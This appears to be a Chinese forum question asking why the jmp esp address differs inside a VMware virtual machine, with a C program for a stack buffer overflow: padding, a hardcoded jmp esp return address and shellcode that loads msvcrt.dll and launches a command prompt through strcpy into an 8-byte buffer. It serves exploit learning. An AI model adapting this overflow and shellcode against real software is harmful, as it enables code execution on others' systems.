wmware虚拟机中jmp esp地址不一样
看以下代码:
#include <stdio.h>#include <string.h>char name[] = "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x12\x45\xfa\x7f" //7ffa4512 也即是jmp esp地址 "\x55\x8B\xEC\x33\xC0\x50\x50\x50"//以下是启动命令提示符的shellcode"\xC6\x45\xF4\x4D""\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56" "\xC6\x45\xF7\x43""\xC6\x45\xF8\x52""\xC6\x45\xF9\x54""\xC6\x45\xFA\x2E""\xC6\x45\xFB\x44""\xC6\x45\xFC\x4C""\xC6\x45\xFD\x4C""\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2""\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D""\x89\x45\xF4\xB8\x61\x6E\x64\x2E" "\x89\x45\xF8\xB8\x63\x6F\x6D\x22""\x89\x45\xFC\x33\xD2\x88\x55\xFF""\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";int main(){ char output[8]; strcpy(output, name); for(int i=0;i<8&&output[i];i++) printf("\\0x%x",output[i]); return 0;}